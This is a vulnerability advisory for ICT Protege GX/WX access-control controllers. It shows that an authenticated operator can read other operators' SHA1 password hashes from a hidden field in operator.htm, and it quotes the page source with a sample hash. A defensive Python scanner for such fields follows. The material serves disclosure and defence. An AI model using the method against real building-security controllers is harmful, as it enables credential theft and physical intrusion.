# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm
Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver:2.08.1002 K1B3
                      Lib:04.00.217
                      Int:2.3.235.J013
                      OS:2.0.20
                  WX: Ver:4.00284 H062
                      App:02.08.766
                      Lib:04.00.169
                      Int:02.2.208
Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.
Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.
Tested on: Microsoft-WinCE/6.00
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
08.02.2022

--

Navigate to http://CONTROLLER_IP/operator.htm
Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""><input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...
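A defender-side check for the condition shown in the source above, as an added example that is not part of the original advisory: it scans a saved copy of a web page for input fields whose value is a hex string of digest length, which is how the hidden pswdsha field appears. The function and class names are hypothetical, and the sample markup is constructed, with a hash generated at run time.

```python
import hashlib
import re
from html.parser import HTMLParser

# Hex string lengths mapped to the digest they most likely represent.
DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}
HEX_RE = re.compile(r"[0-9a-fA-F]+")


class DigestFieldFinder(HTMLParser):
    """Collects <input> elements whose value attribute looks like a hash digest."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = {name: (value or "") for name, value in attrs}
        value = attr.get("value", "")
        kind = DIGEST_LENGTHS.get(len(value))
        if kind and HEX_RE.fullmatch(value):
            self.findings.append({
                "id": attr.get("id") or attr.get("name", ""),
                "type": attr.get("type", "text").lower(),
                "digest": kind,
                "line": self.getpos()[0],  # line of the tag in the saved page
            })


def find_digest_fields(html):
    """Return one finding per input field that carries a digest-like value."""
    finder = DigestFieldFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample modelled on the advisory's excerpt; the hash is generated here.
SAMPLE = """<p><label id="OperatorPassword">Password</label>
<input type="password" id="Password" value="" class="narrow" readonly="">
<input type="button" id="ButtonChangeOperatorPassword" value="Change Password"></p>
<input type="hidden" id="pswdsha" value="%s">
""" % hashlib.sha1(b"constructed sample").hexdigest()

if __name__ == "__main__":
    for f in find_digest_fields(SAMPLE):
        print("line %(line)d: %(type)s input '%(id)s' holds a %(digest)s-length value" % f)
```

Run against pages saved while logged in as a low-privileged operator, a finding on a field such as pswdsha shows that credential material is being sent to the browser and should be removed from the server's response.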